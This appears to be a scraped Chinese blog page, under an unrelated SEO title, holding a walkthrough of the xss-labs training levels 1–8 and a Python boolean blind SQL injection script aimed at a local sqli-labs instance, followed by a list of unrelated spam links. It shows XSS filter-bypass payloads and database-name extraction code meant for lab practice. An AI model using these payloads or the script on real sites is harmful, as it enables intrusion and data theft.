当前位置: 首页 > wzjs >正文

如何套用别人网站模板推广普通话手抄报内容资料

如何套用别人网站模板,推广普通话手抄报内容资料,天安云谷网站建设,素材设计做的好的网站有哪些xss-labs 1到8关第一关我们发现&#xff0c;当我们更改name等于不同的值时&#xff0c;有不同的返回结果&#xff0c;因此在这里可能有xss漏洞然后直接进行测试&#xff0c;在name后面加入xss攻击语句​<script>alert(1)</script>第二关观察到input标签里面的value…

xss-labs 1到8关

第一关

我们发现,当我们更改name等于不同的值时,有不同的返回结果,因此在这里可能有xss漏洞

然后直接进行测试,在name后面加入xss攻击语句

​<script>alert(1)</script>

第二关

观察到input标签里面的value元素可以尝试突破,逃出引号后,可以使用事件来闭合后面的引号,这里距离onclick事件,当点击输入框后,执行这个弹窗

"><script>alert(1)</script

第三关

1' onclick='alert(1)

第四关

用"闭合后插入

1" onclick="alert(1)

第五关

查看源码发现把<script>转换成了<scr_ipt>,把on转成了o_n,这俩不能用了,换个标签

1'"> <a href="javascript:alert(1)">"'test</a>

第六关

直接使用大小写绕过

1'"> <a HRef="javaSCRipt:alert(1)">"'test</a>

第七关

1'"> <a hrhrefef="javascrscriptipt:alert(1)">"'test</a>

 双写了href和script

第八关

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

直接编码javascript:alert(1)为html实体编码

python实现自动化布尔自注的代码进行优化(二分查找)

import requests# 目标URL
url = "http://127.0.0.1/sqli/Less-8/index.php"charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "# 推断数据库名的长度
def get_database_length():length = 0while True:length += 1payload = f"1' AND (SELECT length(database()) = {length}) -- "response = requests.get(url, params={"id": payload})if "You are in..........." in response.text:return lengthif length > 50:  # 防止无限循环breakreturn 0# 使用二分查找推断数据库名
def get_database_name(length):db_name = ""for i in range(1, length + 1):left, right = 0, len(charset) - 1while left <= right:mid = (left + right) // 2char = charset[mid]payload = f"1' AND (SELECT substring(database(), {i}, 1) >= '{char}') -- "response = requests.get(url, params={"id": payload})if "You are in" in response.text:left = mid + 1else:right = mid - 1db_name += charset[right]return db_name# 主函数
if __name__ == "__main__":length = get_database_length()if length > 0:print(f"Database length: {length}")db_name = get_database_name(length)print(f"Database name: {db_name}")else:print("Failed to determine database length.")

http://www.dtcms.com/wzjs/155467.html

相关文章:

  • 网站关键词搜索优化是怎么做的亚马逊跨境电商开店流程及费用
  • 如何用ps做照片模板下载网站自己如何制作网页
  • 做欧洲电商看哪个网站哔哩哔哩推广网站
  • 可以做微信游戏的网站2023智慧树网络营销答案
  • 大型网站开发教程爱站网 关键词挖掘工具
  • 建站平台利弊市场营销考试题目及答案2022
  • 高端建站模版哪里做网络推广
  • 三门峡住房城乡建设局网站十大营销模式
  • 周口市城乡建设局网站广州 竞价托管
  • 商城网站建设经验广州网站营销seo
  • 家政服务网站源码公司网站建设平台
  • 取消工法建设部网站如何注册属于自己的网站
  • 惠州市两学一做网站搜索引擎关键词优化方案
  • 做网站免费吗2023年6月疫情恢复
  • 上海html5网站建设自动推广工具
  • 米拓做的网站如何改代码长沙网站seo服务
  • 丹东网站建设万能bt搜索引擎
  • 株洲网站网络推广怎么做建站系统哪个比较好
  • 江西省城乡和住房建设厅网站一句简短走心文案
  • 电商网站如何提高转化率公关公司
  • 成都互联网网站建设自媒体账号申请
  • 上海网页建站模板网站推广的技术有哪些
  • 外链seo推广搜索引擎优化的各种方法
  • 建筑学院网站企业品牌策划
  • 做金融网站看那些素材百度云网盘资源链接
  • 响应式科技公司网站模板今日热榜
  • 公司建站详细步骤查企业信息查询平台
  • 公司网站建设公seo概念的理解
  • 路由器端口转发做网站访问量百度站长资源平台
  • 东丽区做网站谷歌seo和百度seo